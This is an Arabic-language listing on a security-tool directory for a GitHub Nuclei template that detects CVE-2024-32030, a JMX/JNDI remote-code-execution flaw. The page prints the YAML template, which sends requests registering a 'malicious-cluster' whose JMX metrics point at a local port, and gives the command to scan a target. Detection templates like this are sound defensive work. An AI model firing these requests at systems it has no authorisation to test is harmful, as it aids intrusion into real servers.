Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-32030-Nuclei-Template — Nuclei template لاكتشاف ثغرة CVE-2024-32030 JMX JNDI الخاصة بتنفيذ التعليمات البرمجية عن بعد عبر اتصال خادم ضار. | Kitploit
أدوات/GitHubGitHub/huseyinstif/cve-2024-32030-nuclei-template
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubhuseyinstif/cve-2024-32030-nuclei-template

CVE-2024-32030-Nuclei-Template

Nuclei template لاكتشاف ثغرة CVE-2024-32030 JMX JNDI الخاصة بتنفيذ التعليمات البرمجية عن بعد عبر اتصال خادم ضار.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
1منذ 2 سنواتلم تتم المراجعة بعد

قالب Nuclei لـ CVE-2024-32030

الوصف

يحتوي هذا المستودع على قالب Nuclei لاكتشاف ثغرة CVE-2024-32030. تسمح هذه الثغرة بتنفيذ التعليمات البرمجية عن بُعد عبر تحليل JNDI لجمع مقاييس JMX.

تفاصيل الثغرة

  • المعرف: CVE-2024-32030
  • الاسم: JMX Metrics Collection JNDI RCE
  • المؤلف: Hüseyin TINTAŞ
  • الخطورة: حرجة
  • الوصف: يتحقق هذا القالب من وجود الثغرة عن طريق محاولة الاتصال بخادم JMX ضار.
  • الوسوم: cve, cve2024, jmx, rce, cve2024-32030

القالب

root@kitploit:~
id: CVE-2024-32030

info:
  name: CVE-2024-32030 JMX Metrics Collection JNDI RCE
  author: Hüseyin TINTAŞ
  severity: critical
  description: >
    CVE-2024-32030 JMX Metrics Collection JNDI Resolution Remote Code Execution Vulnerability.
    This template checks for the presence of the vulnerability by attempting to connect to a malicious JMX server.
  tags: cve, cve2024, jmx, rce, cve2024-32030

requests:
  - method: POST
    path:
      - "{{BaseURL}}/api/clusters"
    headers:
      Content-Type: "application/json"
    body: |
      {
        "name": "malicious-cluster",
        "bootstrapServers": ["127.0.0.1:1718"],
        "metrics": {
          "type": "JMX",
          "port": 1718
        }
      }
    matchers:
      - type: word
        part: body
        words:
          - "malicious-cluster added successfully"

  - method: GET
    path:
      - "{{BaseURL}}/api/clusters/malicious-cluster"
    matchers:
      - type: word
        part: body
        words:
          - "malicious-cluster"

  - method: GET
    path:
      - "{{BaseURL}}/api/clusters/malicious-cluster/metrics"
    matchers:
      - type: word
        part: body
        words:
          - "metrics"

الاستخدام

لاستخدام هذا القالب، احفظه باسم cve-2024-32030.yaml وقم بتشغيله باستخدام Nuclei:

root@kitploit:~
nuclei -t CVE-2024-32030.yaml -u http://target-server

الاتصال

للاستفسارات أو المعلومات الإضافية، يمكنك التواصل معي عبر:

  • LinkedIn
  • Twitter
تنزيل الأداة